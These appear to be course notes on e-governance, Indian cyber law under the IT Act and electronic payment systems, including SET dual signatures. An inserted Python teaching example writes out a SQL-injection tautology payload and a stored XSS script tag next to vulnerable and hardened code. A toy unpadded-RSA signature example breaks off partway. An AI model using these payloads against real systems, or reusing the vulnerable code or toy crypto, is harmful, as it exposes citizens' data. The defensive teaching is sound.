Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally, four basic models are available – government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance –

Both the terms are treated to be the same; however, there is some difference between the two. E-government is the use of ICTs in public administration - combined with organizational change and new skills - to improve public services and democratic processes and to strengthen support to the public. The problem in this definition, to be a congruent definition of e-governance, is that there is no provision for governance of ICTs. As a matter of fact, the governance of ICTs requires, most probably, a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of the technologies that both help governing and have to be governed. The Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended to reach the desired individual have been met with. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup with the support of local processes and parameters for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizen economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE


A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department or anywhere through the network. This is because of the characteristics of CORBA - it is a location transparent, language independent, implementation independent and Operating System independent architecture. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Data Base Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as Distributed Computing Environment (DCE), the Kerberos Protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, Public Key Security with Secure Sockets Layer (SSL) is popular with Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows:

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities, but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.

G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community – providers of goods and services – to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment to businesses to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B) - Refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G) - Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter

• Generally, but not always, involving

– Long Term Contracts

– User Charges and/or Payments flowing between the Parties

– Shared Investments, but Mainly Private

– Risk Sharing by the Parties

• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

• Fiscal Head Room

• As a Way of Financing the Project

• Separate Policy & Regulation from Operations

• Make the Good or Service Available

• Pay for Performance and Output

• Introduce Competition – For and In the Market

The Need to Set the Right Priorities –

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:

Shared goals

Shared resources (time money expertise people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps


Crafting the Partnership

Implementing the Partnership

Project Management –

Six Distinct Phases

Genesis

What's the need?

What's driving the need (rationale)?

Facility non-compliance, natural disaster, budget deficit

Is there a need for a Public/Private Partnership?

Preliminary Project Definition

Feasibility

Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

Market Research

Economic/Financial Analysis

Program Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project?

Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback and economics?

Master Schedule/Budget

Political Climate

Any potential "fatal flaws" that could derail the project?

Procurement and Contracting

How do you choose and contract with the best-value private partner?

What's the best delivery method?

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow?

Procurement Approach

Sole Source, RFP, Low Bid

Risk Allocation between Public and Private Partners

Structuring of Contract/Risks and Rewards

Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT by citizens and businesses. Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of this service.

2. INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

understanding an organization's information security requirements and the need to establish policy and objectives for information security

implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks

monitoring and reviewing the performance and effectiveness of the ISMS, and continual improvement based on objective measurement

Data security requires a set of security requirements:

Authentication – capability to identify who is using the services (person or software program); the process of verifying that you are who you say you are

Authorization – capability to give rights of access to resources; the process of verifying that someone has the rights to do what she is trying to do

Confidentiality – capability to prevent unauthorized access to information

Integrity – capability to prevent information from unauthorized modification, and ensuring that information can be relied upon and is accurate and complete

Traceability – capability to chronologically interrelate any transaction to a person or system that performed the action, in a way that is verifiable

Non-repudiation – capability to prevent the intervening person or system in an event or action from denying or challenging their participation in the event

Examples of organizational and technical measures to prevent unauthorized access and processing are shown below:

Protecting premises, equipment and systems software, including input-output units

Protecting software applications used to process personal data

Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks

Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data

Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples of cyber attacks use techniques like packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis

Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness

Continually improve its control environment

Effectively achieve legal and regulatory compliance

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.
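The two web application weaknesses cited above (SQL injection and XSS), shown as an added example that is not code from these notes or from any real portal: a constructed in-memory SQLite table of permit records stands in for an e-Government database, the injectable lookup sits beside its parameterised form, and the output renderer is shown with and without HTML escaping. Table, column and record values are all constructed.

```python
"""Permit lookup for a hypothetical citizen portal: injectable vs. hardened (added example)."""
import html
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed records; the third holder name is deliberately hostile markup."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE permits (permit_no TEXT, holder TEXT, status TEXT)")
    conn.executemany(
        "INSERT INTO permits VALUES (?, ?, ?)",
        [
            ("P-1001", "A. Citizen", "approved"),
            ("P-1002", "B. Resident", "pending"),
            ("P-1003", "<script>alert(1)</script>", "rejected"),  # stored XSS payload
        ],
    )
    return conn


def lookup_unsafe(conn: sqlite3.Connection, permit_no: str) -> list:
    """VULNERABLE: request text is concatenated into the SQL statement, so any
    quote character in it changes the query's logic (SQL injection)."""
    sql = (
        "SELECT permit_no, holder, status FROM permits WHERE permit_no = '"
        + permit_no
        + "'"
    )
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, permit_no: str) -> list:
    """HARDENED: the value is passed as a bound parameter; the database driver
    never parses it as SQL, whatever characters it contains."""
    return conn.execute(
        "SELECT permit_no, holder, status FROM permits WHERE permit_no = ?",
        (permit_no,),
    ).fetchall()


def render_unsafe(rows: list) -> str:
    """VULNERABLE: database content is written into the page unescaped, so a
    stored payload such as the one in P-1003 executes in every viewer's browser."""
    return "".join(f"<li>{p}: {h} ({s})</li>" for p, h, s in rows)


def render_safe(rows: list) -> str:
    """HARDENED: every dynamic value is HTML-escaped before it reaches the page."""
    return "".join(
        f"<li>{html.escape(p)}: {html.escape(h)} ({html.escape(s)})</li>"
        for p, h, s in rows
    )


if __name__ == "__main__":
    conn = build_db()
    tampered = "' OR '1'='1"        # classic tautology in the permit number field
    print("unsafe rows returned:", len(lookup_unsafe(conn, tampered)))
    print("safe rows returned:  ", len(lookup_safe(conn, tampered)))
    print(render_safe(lookup_safe(conn, "P-1003")))
```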

PREPARED BY ARUN PRATAP SINGH 54

54

CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order or any unjust or shameful act. The "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. World wide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, Threatening Email, Assuming someone's Identity, Sexual Harassment, Defamation, Spam and Phishing are some examples where computers are used to commit crime, whereas Viruses, Worms and Industrial Espionage, Software Piracy and Hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in the IT ACT 2000.

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions, requesting them to enter their Username, Password or other personal information to access their Account for some reason.

The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "Voice" and "phishing". Vishing exploits the public's trust in landline telephone services.

Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base

• 121 million Internet users
• 65 million active Internet users, up by 28% from 51 million in 2010
• 50 million users shop online on e-commerce and online shopping sites
• 46+ million social network users
• 346 million mobile users had subscribed to data packages

CYBER LAW

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means, commits hack.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

• secures access;
• downloads, copies or extracts any data, computer database or any information;
• introduces or causes to be introduced any virus or contaminant;
• disrupts or causes disruption;
• denies or causes denial of access to any person;
• provides any assistance to any person to facilitate access;
• charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section 43

Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means.

Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both." [S66]

S66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

• any information that is grossly offensive or has menacing character; or
• any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or
• any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages;

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67 A - Punishment for publishing or transmitting material containing sexually explicit act, etc., in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67 C - Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with imprisonment for a term which may extend to three years and shall also be liable to fine."

IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This Act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce.

Following the UN resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offences and contraventions
4. Justice dispensation systems for cybercrimes

Offences

Section | Offence | Punishment

65 | Tampering with computer source documents - intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force | Imprisonment up to three years or/and with fine up to 2 lakh rupees

66 | Hacking | Imprisonment up to three years or/and with fine up to 5 lakh rupees

66-A | Sending offensive message through electronic means - sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages | Imprisonment up to three years and with fine

Criticisms

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.

E-Wallet

The e-wallet is another payment scheme that operates like a carrier of e-cash and other information. The aim is to give shoppers a single, simple and secure way of carrying currency electronically. Trust is the basis of the e-wallet as a form of electronic payment.

Procedure for using an e-wallet:

1. Decide on an online site where you would like to shop.
2. Download a wallet from the merchant's website.
3. Fill out personal information such as your credit card number, name, address and phone number, and where merchandise should be shipped.
4. When you are ready to buy, click on the wallet button; the buying process is fully executed.

Smart Cards

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

Smart card processing (figure)

Smart Card Applications

• Ticketless travel: Seoul bus system (4M cards, 1B transactions since 1996); planned for the SF Bay Area system
• Authentication, ID
• Medical records
• E-cash
• Store loyalty programs
• Personal profiles
• Government licenses
• Mall parking

Credit cards

• It is a plastic card having a magnetic number and code on it.
• It has some fixed amount to spend.
• The customer has to repay the spent amount after some time.

Processing a credit card payment (figure)

Risk in using credit cards:

• Operational risk
• Credit risk
• Legal risk

Secure Electronic Transaction (SET) Protocol

• Jointly designed by MasterCard and Visa with the backing of Microsoft, Netscape, IBM, GTE, SAIC and others.
• Designed to provide security for card payments as they travel on the Internet.
• Contrasted with the Secure Sockets Layer (SSL) protocol, SET validates consumers and merchants in addition to providing secure transmission.

SET specification

• Uses public key cryptography and digital certificates for validating both consumers and merchants.
• Provides privacy, data integrity, user and merchant authentication, and consumer non-repudiation.

The SET protocol (figure)

What is a payment gateway?

A payment gateway is an e-commerce application service provider service that authorizes payments for e-businesses, online shopping, etc.

A payment gateway protects credit card details by encrypting sensitive information such as credit card numbers, to ensure that information passes securely between the customer and the merchant, and also between the merchant and the payment processor.

How it works (figure)

Payments in India: going the e-way

e-PAYMENT SYSTEM IN INDIA

• Ever-increasing technology changes
• Growing Internet access and mobile subscriber base
• Rising consumer confidence
• Convenient delivery/payment models
• India has been one of the fastest growing countries for payment cards in the Asia-Pacific region
• India currently has approximately 130 million cards (both debit and credit) in circulation

GROWTH IN e-PAYMENT SYSTEM (figure)

REGULATION

The Reserve Bank of India (RBI) has been supportive in the development of electronic payments. In this direction the "Payments and Settlement System Act" was enacted. Apart from being supportive, the RBI has also initiated various programs to encourage e-payments.

CHANNELS OF PAYMENT

Indian banks have put in place various channels of electronic payments to encourage customers to adopt the electronic mode. Channels like the Internet, mobile, ATMs and drop boxes are some of the most frequently used channels apart from bank branches.

MARKET MAPPING

The e-payments processing market has two major players, namely Tech Process and Bill Desk, which is a pure-play electronic transaction processing company.

The Indian payment system is transforming from paper mode to electronic mode. Two main reasons for such a shift are:

1. The regulator has mandated routing all high-value transactions electronically to minimize movement of money and risk.
2. At the retail end, customers are realizing the efficiency of electronic payments.

SHIFTS IN THE PAYMENT SYSTEM (figure)

TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT

• Electronic Clearing Service (Credit and Debit)
• National Electronic Fund Transfer (NEFT)

THE RULING PLASTIC MONEY

• Credit cards
• Debit cards
• ATM cards

PayPal

PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods such as checks and money orders. It is subject to the US economic sanctions list and other rules and interventions required by US laws or government. PayPal is an acquirer, performing payment processing for online vendors, auction sites and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States, at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Scottsdale, Charlotte and Austin in the United States; Chennai in India; Dublin in Ireland; Kleinmachnow in Germany; and Tel Aviv in Israel. Since July 2007, PayPal has operated across the European Union as a Luxembourg-based bank.

Google Wallet

Google Wallet was launched in 2011, serving a similar function to PayPal to facilitate payments and transfer money online. It also features highly robust security and additional features such as the ability to send payments as attachments via email.

CHARACTERISTICS OF PAYMENT SYSTEM

• There is no paper involved, so electronic payments can be effected directly from home or office.
• Fast, efficient, safe, secure and generally less costly than paper-based alternatives, e.g. cheques.
• Electronic payments are fully traceable.
• In Ireland, the clearing time for standard electronic payments is next-day value for interbank transfers, subject to the payment instruction being received ahead of 'shut-off' times, which can vary from bank to bank. Payment instructions received after the 'shut-off' time will be processed one working day later.
• Most banks offer same-day value for payments made to other accounts held in that same bank.
• Many banks offer same-day money transfer inter-bank services for large-value payments.
• Unlike cheques, electronic payments don't 'bounce', as payments will not be effected unless the funds are available in the first place.

Features of Payment Methods

• Anonymity: whether the payment method is anonymous
• Security: whether the payment method is secure
• Overhead cost: the overhead cost of processing a payment
• Transferability: whether a payment can be carried out without the involvement of a third party
• Divisibility: whether a payment can be divided into arbitrarily small payments whose sum is equal to the original payment
• Acceptability: whether the payment method is supported globally

4C PAYMENT METHODS

To make the e-commerce system functional, we also need to incorporate payment functions into the system. In the physical world there are 4 types of payment methods:

• Cash
• Credit card
• Check
• Credit/debit (fund transfer)

A payment method should be:

- Very secure
- Having low overhead cost
- Transferable
- Acceptable anywhere
- Divisible
- Anonymous

Comparison of the 4C payment methods (figure)

SET PROTOCOL FOR CREDIT CARD PAYMENT

• The credit card is one of the most commonly used payment methods in e-commerce, in particular B2C e-commerce.
• Before the introduction of the SET protocol, secure credit card payment was usually carried out over an SSL connection.

Advantage of SSL

• It ensures the secure transmission of credit card information over the Internet.

Disadvantage of SSL

• It is not a complete credit card payment method.
• For example, it cannot support online credit card authorization.

SET is specially developed to provide secure credit card payment over the Internet. It is now widely supported by major credit card companies including Visa and MasterCard.

• SET aims at satisfying the following security requirements in the context of credit card payment:
  - Confidentiality: sensitive messages are encrypted so that they are kept confidential.
  - Integrity: nearly all messages are digitally signed to ensure content integrity.
  - Authentication: authentication is performed through a public key infrastructure.

SET network architecture

• Merchant: a seller which is connected to an acquirer.
• Cardholder: a registered holder of the credit card, who is a buyer.
• Issuer: the bank that issues the credit card to a cardholder.
• Acquirer: the bank that serves as an "agent" to link a merchant to multiple issuers. A merchant can process various credit cards through a single acquirer.
• Payment gateway: this is typically connected to the acquirer. The payment gateway is situated between the SET system and the financial network of the current credit card system for processing the credit card payment.

SET digital certificate system (figure)

Dual signature generation and verification

• In the physical credit card system:
  - the Payment Instructions (PI), including the cardholder's credit card number and signature, are not kept confidential;
  - data integrity can basically be ensured by using printed receipts;
  - cardholder authentication relies on simple signature checking only.
• In an electronic credit card system:
  - the Order Information (OI) and PI can be digitally signed to ensure data integrity;
  - the sensitive credit card information may still be disclosed to other people.
• SET introduces a novel method called the dual signature (DS) to ensure data integrity while protecting the sensitive information.

How the merchant and the payment gateway can verify the DS

• The merchant is provided with OI, H[PI] and DS.
• The dual signature can be verified as follows:

Step 1: The merchant first computes H[ H[PI] || H[OI] ].

Step 2: He then decrypts the digital signature with the cardholder's public signature key as follows: D_RSA[ DS | key_public_sign,cardholder ], where key_public_sign,cardholder is the public signature key of the cardholder.

Step 3: Finally he compares the two terms H[ H[PI] || H[OI] ] and D_RSA[ DS | key_public_sign,cardholder ]. They should be the same if the transmitted DS has not been changed; otherwise the order is not valid.

The payment gateway is provided with PI, H[OI] and DS. By using the dual signature method, each cardholder can link OI and PI while releasing only the necessary information to the relevant party. If either the OI or PI is changed, the dual signature will no longer be valid.
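A worked version of the three steps above, added here as an illustration rather than code from the original notes: the cardholder builds DS = Sign(H[H[PI] || H[OI]]), the merchant checks it from OI and H[PI] only, and the payment gateway from PI and H[OI] only, so neither party sees the other's half. It assumes a toy textbook RSA key over fixed Mersenne primes and SHA-224 in place of SET's certified keys and padded RSA; the order and payment strings are constructed sample data.

```python
import hashlib

# Toy textbook RSA key pair for the cardholder's signature key (assumption: fixed
# Mersenne primes, no padding; a deployed SET implementation uses padded RSA from a
# vetted library and certified keys).
P = (1 << 127) - 1          # 2^127 - 1, prime
Q = (1 << 107) - 1          # 2^107 - 1, prime
N = P * Q                   # 234-bit modulus
E = 65537                   # public exponent


def _modinv(a: int, m: int) -> int:
    """Extended Euclid: return x with (a * x) % m == 1."""
    r0, r1, x0, x1 = m, a, 0, 1
    while r1:
        q = r0 // r1
        r0, r1 = r1, r0 - q * r1
        x0, x1 = x1, x0 - q * x1
    return x0 % m


D = _modinv(E, (P - 1) * (Q - 1))   # private signature exponent


def H(data: bytes) -> bytes:
    """Message digest. SHA-224 is used so the digest, read as an integer, is below N."""
    return hashlib.sha224(data).digest()


def dual_signature(oi: bytes, pi: bytes) -> int:
    """Cardholder: DS = Sign_private( H[ H[PI] || H[OI] ] )."""
    m = int.from_bytes(H(H(pi) + H(oi)), "big")
    return pow(m, D, N)


def recover(ds: int) -> int:
    """Apply the cardholder's public signature key: D_RSA[ DS | key_public_sign,cardholder ]."""
    return pow(ds, E, N)


def merchant_verify(oi: bytes, h_pi: bytes, ds: int) -> bool:
    """Merchant holds OI in clear plus only H[PI]; PI itself never reaches the merchant."""
    expected = int.from_bytes(H(h_pi + H(oi)), "big")
    return recover(ds) == expected


def gateway_verify(pi: bytes, h_oi: bytes, ds: int) -> bool:
    """Payment gateway holds PI in clear plus only H[OI]; it never sees the order details."""
    expected = int.from_bytes(H(H(pi) + h_oi), "big")
    return recover(ds) == expected


# Constructed sample order information and payment instructions (not real card data).
OI = b"order=12345;item=textbook;amount=49.00;merchant=bookshop"
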